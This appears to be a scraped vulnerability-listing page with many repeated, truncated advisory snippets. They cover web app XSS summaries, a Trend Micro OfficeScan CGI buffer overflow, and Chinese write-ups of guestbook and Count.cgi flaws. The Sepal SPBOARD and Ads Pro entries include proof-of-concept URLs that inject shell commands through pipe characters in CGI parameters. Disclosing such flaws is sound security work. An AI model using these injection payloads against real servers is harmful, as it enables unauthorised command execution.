Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. Webglimpse: crossite scripting. CimWebCenter: crossite scripting...

Cross-Site Scripting vulnerabilities in Webglimpse

Здравствуйте 3APA3A! Сообщаю вам о найденных мною новых Cross-Site Scripting уязвимостях в локальной поисковой системе Webglimpse. XSS IE: Уязвимости в webglimpse.cgi в параметрах case, whole, lines, errors, age, filter и wordspan...

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. Webglimpse: crossite scripting. CimWebCenter: crossite scripting...

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. Fusebox Framework: crossite scripting...

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. CimWebCenter: crossite scripting, informationleakage...

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

Trend Micro OfficeScan CGI programs POST request buffer overflow

Added: 10/31/2008 CVE: CVE-2008-3862 BID: 31859 OSVDB: 49275 Background Trend Micro OfficeScan is a centralized virus and security scan management system. Problem A buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending specially crafted HTTP POST requests ...

Trend Micro OfficeScan CGI programs POST request buffer overflow

Added: 10/31/2008 CVE: CVE-2008-3862 BID: 31859 OSVDB: 49275 Background Trend Micro OfficeScan is a centralized virus and security scan management system. Problem A buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending specially crafted HTTP POST requests ...

Trend Micro OfficeScan CGI programs POST request buffer overflow

Added: 10/31/2008 CVE: CVE-2008-3862 BID: 31859 OSVDB: 49275 Background Trend Micro OfficeScan is a centralized virus and security scan management system. Problem A buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending specially crafted HTTP POST requests ...

Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability

No description provided by source. | | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | | | / \ | || | | | | | || || \ || // \ | | | Sepal's SPBOARD v4.5 board.cgi Remote Command Execution Vulnerability Script : : POC : |---...

Sepal SPBOARD 4.5 - board.cgi Remote Command Execution

Sepal SPBOARD 4.5 - board.cgi Remote Command Execution | | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=downfile |---...

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

sepalspboard-exec.txt

| | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=downfile |--- http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=downfile |--- Open By Mozil...

Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability

Exploit for cgi platform in category web applications =============================================================== Sepal SPBOARD 4.5 board.cgi Remote Command Exec Vulnerability =============================================================== Sepal's SPBOARD v4.5 board.cgi Remote Command Executi...

Sepal SPBOARD 4.5 - 'board.cgi' Remote Command Execution

| | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=downfile |--- http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=downfile |--- Open By Mozil...

Trend Micro OfficeScan CGI Parsing Buffer Overflow Vulnerability

Trend Micro OfficeScan is prone to stack based buffer overflow vulnerability. The vulnerability is due to boundary error in the CGI modules when processing specially crafted HTTP request. SPDX-FileCopyrightText: 2008 Greenbone AG Some text descriptions might be excerpted from a referenced sources...

Ads Pro (dhtml.pl page) Remote Command Execution Exploit

No description provided by source. \Adspro Script Remote Command Execution/ Author S0l1D Script Adspro Homepage http://adspro.mhfmedia.com/index.shtm \Exploit/ http://serv.com/cgi-bin/adspro/dhtml.pl?page=adverttop.htm|id| http://serv.com/cgi-bin/adspro/dhtml.pl?page=advertlogin.htm|id|...

Tammie's Husband留言板CGI漏洞

simplestguest.cgi留言板程序没有正确检查输入数据的有效性，直接用用户提供的 guestbook 变量来作为文件名，并用open函数打开。因此任何人都可以在远程系 统上以web服务器的权限执行任意命令。 有问题的代码部分： $outputdir = $basedir . / . $contentsbyname'guestbook' ; $outputfile = $outputdir ; sends to write output. .... OUTPUT sub output &BakeCookies'guestbook',Signed; open OUTFILE,...

Count.cgi(wwwcount)远程缓冲区溢出漏洞

BugCVE: CVE-1999-0021 BUGTRAQ: 128 Count.cgi wwwcount是一个非常流行的Web站点跟踪统计CGI程序。一般它作为Web页面点击数统计。1997年10月，这个程序被发现了两个远程漏洞。第一个漏洞比较轻微，它能允许远程用户浏览到受限制的.GIF文件，可能泄漏.GIF文件里潜在的敏感数据。 第二个漏洞比较严重，count.cgi程序在处理QUERYSTRING环境变量的时候存在缓冲区溢出漏洞。远程攻击者可以发送一个超长的请求给程序就能进行溢出攻击，以Web用户的权限在系统执行任意命令。 2.3 Muhammad A. Muquit...